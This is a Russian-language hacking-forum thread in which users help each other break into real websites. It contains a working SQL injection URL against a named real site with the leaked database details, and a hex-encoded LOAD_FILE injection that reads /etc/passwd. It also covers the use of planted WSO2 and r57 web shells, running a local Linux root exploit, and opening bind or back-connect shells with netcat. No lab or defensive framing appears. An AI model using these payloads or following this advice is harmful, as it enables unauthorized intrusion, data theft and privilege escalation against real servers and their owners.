Это выводит не больше чем 1024 символа, тем более проблему именно с заменой части хеша на ***** не решает.. ЗЫ Скрин
Поставь такие же настройки, потом тыкни Get Quantity, Get Names From Information_Schema, отметь нужные поля и нажми Get Data.. СКРИН
Песня не кончается. Get Quantity выполняется нормально, а вот на следующем пункте, после отправки двух запросов, Сипт затыкается. Скрин
http://www.rsci.ru/katalog/second.php?catID=2&PID=-108+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3/* Database Version: 4.0.27 Database name: rsci User name: rsci@zvm8 Os : zportbld-freebsd6.3
помогите пожалуйста, уважаемые ачатовцы. Есть сервак с линем Linux Kernel 2.6.29 и нанём shell WSO2. Есть локальный сплоит для поднятия рута на С++. http://milw0rm.com/search.php?dong=Linux+Kernel+2.6.29 Я кагбы новинький в сплоитах, плиз, напишити по конреней дейсвия для его запуска.
2 nub-hacker посмотри видео с того же милворма... первую часть до залития шелла можешь пропустить..а дальше ответ на твой вопрос http://milw0rm.com/video/watch.php?id=92
Помогите плиз. я так понял что надо открыть на серваке порт для начала. Я юзаю R57SHELL. Я выбрал выставил порт 333 Использовать "C" далее конктюсь так C:\Documents and Settings\Серёжа>telnet sitewithshell 333 Подключение к sitewithshell...Не удалось открыть подключение к этому узлу, на порт 333: Сбой подключения помогите плиз
nub-hacker ну ты реально нуб...у себя запускай неткат к тебе сервак конектится а не ты к нему..на то и бакконнект
Дело в том, что я нему быть в роли сервака т.к. я сижу за NATom и проброс портов не могу сделать т.к. NAT осуществляется у прова а не у меня на модеме (((((((((((( помогите плиз. //Orb помоги плиз. я тогда буду юзать wso2 /// Какиенить статьи по этому поводу есть на Ачате?
nub-hacker, привет Серёжа =) делай конект через дедик jokester: Я узнал его первее, даже без модцп и подсказок. Называй его скорпиончик Spyder: Как мило) Grey: давайте ему минусов за@#$чим для разнообразия?
Просстите ещё вопрос. http://site.name/index.php?шв=777+union+select+concat_ws(0x3a,LOAD_FILE(0x2f6574632f706173737764)),2,3,4,5+limit+1,1/* Вот инъекция под рутом. По всей видимости использыется ковычек вырбленно т.к с /etc/passwd не вышло и пишлось hexить. Надо создать файл в /tmp/phpinfo.php и вбить код <?phpinfo();?> ========= https://forum.antichat.ru/threadnav34338-1-10.html читал эту статью,так что не думай Joker что я не чего не читаю. но там заливаеться шелл при помощи слэшов. У меня по всей видимости такое не прокатит? или я ошибаюсь??
Люди,что означает это ? credit_card:x:1301:1001::/home/card:/usr/bin/passwd /usr/bin/passwd не шелл же?))У других стоит но логин(нету то бишь),а у других норм - башик...
У тебя цель - забиндить или бэкконнект замутить ? Если забиндить,то запусти netcat со своего компа или откуда-то ещё.Предварительно открой на шелле произвольный незанятый порт.Проверь с помощью grep(хз как) или средствами,которые уже существуют в шелле.Если твой порт отобразился - порт открыт.После этого берёшь netcat и запускаешь его со следуцюищми параметрами: nc host port.Например: nc www.wiw.ru 35149 Если вылетит оболочка шелла с приглашением,то тебе повезло =).При бэкконнекте делай так,как сказал тебе мой дорогой Горе Gorev .Если бинд не катит,то придётся брутить системных юзеров и получать шелл с правами,дабы сменить настройки фаера.Иногда права есть не только у рута+ админы косячат иногда жестко))).Проблемы с натом ? Бери нормальную тачку и вперёд)
Пипл,почему не читаются исходники рнр скриптов?! инклудом.В других подхостеровских папках читаются хтмл файлы...чем же рнр так отличается от хтмл ? Или же там такие жестки настройки даже для поддоменов хостеровских ?! И ещё вопрос:в каких файлах на сервере может храниться префикс MySql ?
